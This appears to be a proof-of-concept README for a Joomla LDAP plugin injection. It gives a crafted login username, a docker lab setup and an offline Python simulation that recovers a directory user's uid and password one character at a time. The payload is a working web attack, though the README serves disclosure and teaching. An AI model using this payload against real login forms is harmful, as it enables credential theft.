An LDAP injection in Joomla's default LDAP authentication plugin was discovered by RIPS. When the plugin is enabled and configured, it can be used to brute-force the username and password of a directory user, character by character, through the normal login form.
The PoC username looks like
XXX;!(|(!(uid=user*))(!(userPassword=password*)))
The plugin substitutes the submitted username into the configured search string and splits the result on ';', so the part after the ';' is run as its own filter. Since !(|(!A)(!B)) is just (A AND B), that filter matches an entry whose uid starts with "user" and whose userPassword starts with "password". Extending either prefix one character at a time and observing whether the login outcome changes recovers both values. Note that the wildcard is compared against the stored userPassword value, so if the directory stores hashed passwords this walks the hash rather than the cleartext.
A demonstration video can be found on Twitter.
Run
docker-compose up
Install Joomla with the following database settings:
Host Name: mysql:3306
Database Name: joomla
Database Username: root
Database Password: root
After installation, delete the folder /var/www/html/plugins/quickicon/phpversionchecker inside the joomla container.
Log in with your admin account, enable the default LDAP plugin, and configure it as below:
Host: openldap
Port: 1389
LDAP V3: Yes
Negotiate TLS: No
Follow Referrals: No
Authorisation Method: Bind and Search
Base DN: dc=example,dc=org
Search String: uid=[search]
User's DN: cn=[username],ou=users,dc=example,dc=org
Connect Username: (leave empty)
Connect Password: (leave empty)
Map: Full Name: fullName
Map: Email: mail
Map: User ID: uid
Save and close.
Now create a new user in the Super Users group with the same username as the user in the openldap container (but a different password); in this case it is user01.
After that, log out and try to brute-force user01 and its password through the login form.
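The following is an added, offline illustration of why the PoC username above works, written for this README and not part of the original PoC or of Joomla. It assumes the plugin behaviour described above: the username replaces [search] in the configured "Search String" (uid=[search]), the result is split on ';', and each part is wrapped in parentheses and searched. The directory, the toy filter parser and the login oracle are all constructed here so the script runs without Joomla or an LDAP server; the oracle simply reports whether any derived filter matched an entry, standing in for the observable difference in Joomla's login response.

```python
"""Blind LDAP injection walk-through for the Joomla LDAP plugin PoC.

Added example for this README (not Joomla code, not the original PoC).
Everything below is simulated: the directory, the filter evaluator and the
login oracle. It exists to show what the injected username turns into and
how prefix wildcards recover a uid and userPassword one character at a time.
"""
import string

# Value configured in the plugin per this README.
SEARCH_STRING = "uid=[search]"

# Constructed stand-in for the openldap container (cleartext userPassword,
# which is what the wildcard comparison needs; hashed values would be walked
# as hash strings instead).
DIRECTORY = [
    {"uid": "user01", "userPassword": "bitnami1", "cn": "User1"},
    {"uid": "admin", "userPassword": "Secr3t!", "cn": "Admin"},
]

# Characters tried at each position. ( ) * \ are left out because they need
# RFC 4515 escaping (\28 \29 \2a \5c), which the toy parser below does not do.
CHARSET = string.ascii_letters + string.digits + "!@#$%^_-."


def injected_username(uid_prefix, pw_prefix):
    """The README's PoC username with the two prefixes filled in."""
    return "XXX;!(|(!(uid=%s*))(!(userPassword=%s*)))" % (uid_prefix, pw_prefix)


def build_filters(username):
    """Assumed plugin behaviour: substitute, split on ';', wrap each part."""
    raw = SEARCH_STRING.replace("[search]", username)
    return ["(" + part + ")" for part in raw.split(";")]


def parse_filter(s):
    """Recursive-descent parser for the subset of RFC 4515 used here:
    (&...), (|...), (!...) and attr=value, where value may end in '*'."""
    def parse(i):
        assert s[i] == "(", "expected '(' at offset %d" % i
        i += 1
        if s[i] in "&|!":
            op, i, kids = s[i], i + 1, []
            while s[i] == "(":
                node, i = parse(i)
                kids.append(node)
            assert s[i] == ")", "unbalanced filter"
            return (op, kids), i + 1
        j = s.index(")", i)
        attr, _, value = s[i:j].partition("=")
        return ("=", attr, value), j + 1

    node, end = parse(0)
    assert end == len(s), "trailing data after filter"
    return node


def matches(node, entry):
    """Evaluate a parsed filter against one entry (case-sensitive toy;
    a real uid uses caseIgnoreMatch, userPassword is octet-string)."""
    op = node[0]
    if op == "&":
        return all(matches(k, entry) for k in node[1])
    if op == "|":
        return any(matches(k, entry) for k in node[1])
    if op == "!":
        return not matches(node[1][0], entry)
    _, attr, value = node
    actual = entry.get(attr)
    if actual is None:
        return False
    if value.endswith("*"):
        return actual.startswith(value[:-1])
    return actual == value


def search(filt):
    """Entries matching one filter string."""
    node = parse_filter(filt)
    return [e for e in DIRECTORY if matches(node, e)]


def login_oracle(username):
    """True if any sub-filter derived from the username matched an entry."""
    return any(search(f) for f in build_filters(username))


def recover(make_payload, charset=CHARSET, max_len=64):
    """Grow a prefix one character at a time while the oracle says 'match'."""
    found = ""
    for _ in range(max_len):
        for c in charset:
            if login_oracle(make_payload(found + c)):
                found += c
                break
        else:
            break  # no character extends the prefix: value is complete
    return found


def recover_password(uid):
    return recover(lambda pw: injected_username(uid, pw))


def recover_uid():
    return recover(lambda u: injected_username(u, ""))


if __name__ == "__main__":
    print(build_filters(injected_username("user", "password")))
    print("uid:", recover_uid())
    print("user01 password:", recover_password("user01"))
```

The second element printed by build_filters is the injected sub-filter; by De Morgan it is equivalent to (&(uid=user*)(userPassword=password*)), which is why a single login attempt answers "does the password of user start with this prefix?". Against a real target the character set would be escaped per RFC 4515 and the oracle would be the login response, not an in-memory search.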